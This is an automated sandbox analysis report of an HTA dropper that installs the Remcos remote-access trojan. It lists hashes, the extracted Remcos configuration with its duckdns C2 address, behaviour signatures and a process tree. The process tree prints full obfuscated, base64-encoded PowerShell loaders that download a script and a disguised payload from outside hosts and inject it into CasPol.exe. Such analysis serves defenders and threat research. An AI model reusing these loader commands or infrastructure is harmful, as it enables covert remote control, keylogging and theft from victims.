Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-12-2024 06:21

General

  • Target

    sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta

  • Size

    144KB

  • MD5

    920910732ff13da38fab9224e65041d6

  • SHA1

    844226d370dc471fa282eaad9e8dabaf59963902

  • SHA256

    7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544

  • SHA512

    1efe02ba682bd628bacebebe8f283276c1ebc6db3bcc3956c59b840d3677d94a6ca18f95182daf8a5d1587a830b2a2cc69d6a9c31a2672c29f8aa294e19cebf7

  • SSDEEP

    768:t1EQuPoGCMum2oum2H5KUJDVUKhCoGVf/Atu360KuBxvmm0wYWzP9k4/k4/k4/kk:tG

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

C2

submarrine.duckdns.org:6946

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GH3PRL

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3356
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3844
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3268
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zw1ax1ao\zw1ax1ao.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2184
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0E3.tmp" "c:\Users\Admin\AppData\Local\Temp\zw1ax1ao\CSC98902E6E2CFF41D19455E225906D4A9.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:224
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:912
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4744
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
                PID:2616
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of SetWindowsHookEx
                PID:3496

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      102B

      MD5

      d3f0ca60e8648b54f3ef0f5b6a5b3765

      SHA1

      9dd2dde67c68762b5be075f96b5158d37e72f3c5

      SHA256

      6c3839ec846907856edd2548afd35288533464ad76936c9a5ed040deedca973c

      SHA512

      bfc6ccae9fbc3164a67bc7c70b93156ce197df309f67a6af9b90e9e3260682de6f61eeed6dd66287ec5e80d2f97fd3450506d44410a583ca89b655a448ce5c93

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      19KB

      MD5

      d5d4b548bd08ee2d5ee7edb07b3083c0

      SHA1

      c7ad5b5df36fd1e4175cbefba4e35f2dbcb63b41

      SHA256

      ed2621d082d8b16b4318d753b71f34c9c25e248266e25740d9285c5d4ae80c0d

      SHA512

      57b1dc1be3c4b5fe501a21f00b815b4a426a779759d5c0210d7ad3d3c0643811f9ccea8e6304a0046e8e5ab5b33087f0db7b8dfc87de950741d37e68c9057202

    • C:\Users\Admin\AppData\Local\Temp\RESA0E3.tmp

      Filesize

      1KB

      MD5

      b377d648677dd89cd7aa895a722a525e

      SHA1

      0fc4f3482dc036a038939b7fe9ea6ab4133fe45b

      SHA256

      78741f331c76c7877ad83b73da2757084695edb2e7891bce515632be5a65d198

      SHA512

      b8f5700db5d8fda822ba393c862035a7246a9ece06f73eedd7a92ce32e082b3d8f86586ad3300f1abed750412da091519fce80e8b31a7adfa5bf4b747a11425c

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zlquizyi.ra4.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\zw1ax1ao\zw1ax1ao.dll

      Filesize

      3KB

      MD5

      08db1083b7a1687490c9c41643765c61

      SHA1

      199b33c94d732a888a03a261006f913c48e30c97

      SHA256

      19eedb5d9fc3e0130718dc876fe28d221517f20e19b995431c6bd1a04d77fa8d

      SHA512

      2a5dcc4697498bb9ba367c616da93874d0ca931610f6a0eaaee3607d8e1e8288673c2a7bde2112f6e5fdc2dacdf5b479927c02a121e7f2c7d25ccda66ffb15c7

    • C:\Users\Admin\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS

      Filesize

      150KB

      MD5

      622118455f9b3d92190edecb9f5a70e4

      SHA1

      ec47a3f75a1a3e197a2745f75015160da5190d76

      SHA256

      d9b6d65cd5e6206ccb41a4d12a0a1cf8d55de31d786cf085d9632e5eaf66914a

      SHA512

      3af7582cd5b8e7ddd5c23f5477fa3f595fdb851e0b7faf51f167c716b0a50ca4cc6af824b8409ca5745ccc72bc56bbfe201c3b6a7630f04a6e2e84ee248bcf91

    • \??\c:\Users\Admin\AppData\Local\Temp\zw1ax1ao\CSC98902E6E2CFF41D19455E225906D4A9.TMP

      Filesize

      652B

      MD5

      ce8a23c52df9dc2a246dd56e59726f90

      SHA1

      5d99b05ac33af95feb595ecfddcbc9fbca08ebff

      SHA256

      e7de7881e38687f8a5f0d391e77647cae71d3998cfa498e5e8209d298857f577

      SHA512

      6b0e9c5a62f92bb62fd3446c26470358a35b5575adc97234b61a097f84c1be414f5f69e8ceeb71e624414a6b4e32f2ec65b1df2674c4cf568452dfd11976cbba

    • \??\c:\Users\Admin\AppData\Local\Temp\zw1ax1ao\zw1ax1ao.0.cs

      Filesize

      498B

      MD5

      dcfc222ae4a88432f5653314f96c284c

      SHA1

      f38c92dfe6c331d9eede174861c22b5cb24d1236

      SHA256

      65b8df15d3df5605ff17738e203c4ad07a534be67bbb493d36a5ef1cbff2733e

      SHA512

      75d2ace08f5908213cf61ccc5c378871d0b5ce47e98221e8c49f4f758216ae0a606799064011011d713c0187c2722700f808fe5138a0cd4320870251c70ecaf7

    • \??\c:\Users\Admin\AppData\Local\Temp\zw1ax1ao\zw1ax1ao.cmdline

      Filesize

      369B

      MD5

      46f5c8e64d89ea1ac5cd1634432c07fb

      SHA1

      c9f4a34db97971e3646c92dc56b216c494698d31

      SHA256

      cd13a2f6d181a253b13e47e9130a0b2081b579bb13d550891b419447d1b12bc4

      SHA512

      c06ba7654f4d910770128620c13d5baee8ff100424c6f74a425a9786c3111435fbbb75f5a61c878620a1303a003e4036abe9cf6f8c6496c14ff594c7965c6225

    • memory/3268-34-0x00000000073D0000-0x0000000007473000-memory.dmp

      Filesize

      652KB

    • memory/3268-38-0x00000000076A0000-0x00000000076BA000-memory.dmp

      Filesize

      104KB

    • memory/3268-6-0x0000000005600000-0x0000000005666000-memory.dmp

      Filesize

      408KB

    • memory/3268-17-0x0000000005E80000-0x00000000061D4000-memory.dmp

      Filesize

      3.3MB

    • memory/3268-18-0x0000000006340000-0x000000000635E000-memory.dmp

      Filesize

      120KB

    • memory/3268-19-0x0000000006360000-0x00000000063AC000-memory.dmp

      Filesize

      304KB

    • memory/3268-22-0x0000000070F90000-0x0000000071740000-memory.dmp

      Filesize

      7.7MB

    • memory/3268-21-0x000000006D850000-0x000000006D89C000-memory.dmp

      Filesize

      304KB

    • memory/3268-20-0x0000000007320000-0x0000000007352000-memory.dmp

      Filesize

      200KB

    • memory/3268-23-0x000000006D9C0000-0x000000006DD14000-memory.dmp

      Filesize

      3.3MB

    • memory/3268-5-0x0000000005360000-0x0000000005382000-memory.dmp

      Filesize

      136KB

    • memory/3268-33-0x0000000006900000-0x000000000691E000-memory.dmp

      Filesize

      120KB

    • memory/3268-35-0x0000000070F90000-0x0000000071740000-memory.dmp

      Filesize

      7.7MB

    • memory/3268-36-0x0000000070F90000-0x0000000071740000-memory.dmp

      Filesize

      7.7MB

    • memory/3268-37-0x0000000007D00000-0x000000000837A000-memory.dmp

      Filesize

      6.5MB

    • memory/3268-7-0x0000000005D10000-0x0000000005D76000-memory.dmp

      Filesize

      408KB

    • memory/3268-39-0x0000000007700000-0x000000000770A000-memory.dmp

      Filesize

      40KB

    • memory/3268-40-0x0000000007920000-0x00000000079B6000-memory.dmp

      Filesize

      600KB

    • memory/3268-41-0x0000000007880000-0x0000000007891000-memory.dmp

      Filesize

      68KB

    • memory/3268-42-0x00000000078B0000-0x00000000078BE000-memory.dmp

      Filesize

      56KB

    • memory/3268-43-0x00000000078C0000-0x00000000078D4000-memory.dmp

      Filesize

      80KB

    • memory/3268-44-0x0000000007900000-0x000000000791A000-memory.dmp

      Filesize

      104KB

    • memory/3268-45-0x00000000078F0000-0x00000000078F8000-memory.dmp

      Filesize

      32KB

    • memory/3268-58-0x00000000078F0000-0x00000000078F8000-memory.dmp

      Filesize

      32KB

    • memory/3268-4-0x0000000070F90000-0x0000000071740000-memory.dmp

      Filesize

      7.7MB

    • memory/3268-64-0x0000000070F9E000-0x0000000070F9F000-memory.dmp

      Filesize

      4KB

    • memory/3268-65-0x0000000070F90000-0x0000000071740000-memory.dmp

      Filesize

      7.7MB

    • memory/3268-3-0x0000000070F90000-0x0000000071740000-memory.dmp

      Filesize

      7.7MB

    • memory/3268-70-0x0000000070F90000-0x0000000071740000-memory.dmp

      Filesize

      7.7MB

    • memory/3268-2-0x0000000005670000-0x0000000005C98000-memory.dmp

      Filesize

      6.2MB

    • memory/3268-1-0x0000000002D50000-0x0000000002D86000-memory.dmp

      Filesize

      216KB

    • memory/3268-0-0x0000000070F9E000-0x0000000070F9F000-memory.dmp

      Filesize

      4KB

    • memory/3496-96-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-122-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-85-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-86-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-87-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-91-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-92-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-93-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-94-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-95-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-157-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-97-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-98-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-99-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-101-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-102-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-103-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-104-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-105-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-106-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-108-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-109-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-110-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-111-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-112-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-113-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-114-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-115-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-117-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-118-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-119-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-120-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-121-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-156-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-124-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-125-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-126-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-127-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-128-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-129-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-130-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-154-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-132-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-133-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-134-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-135-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-136-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-137-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-138-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-140-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-141-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-142-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-143-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-144-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-145-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-146-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-148-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-149-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-150-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-151-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-152-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3496-153-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4744-77-0x00000000056C0000-0x0000000005A14000-memory.dmp

      Filesize

      3.3MB

    • memory/4744-84-0x00000000073B0000-0x000000000744C000-memory.dmp

      Filesize

      624KB

    • memory/4744-83-0x0000000018B00000-0x0000000018C84000-memory.dmp

      Filesize

      1.5MB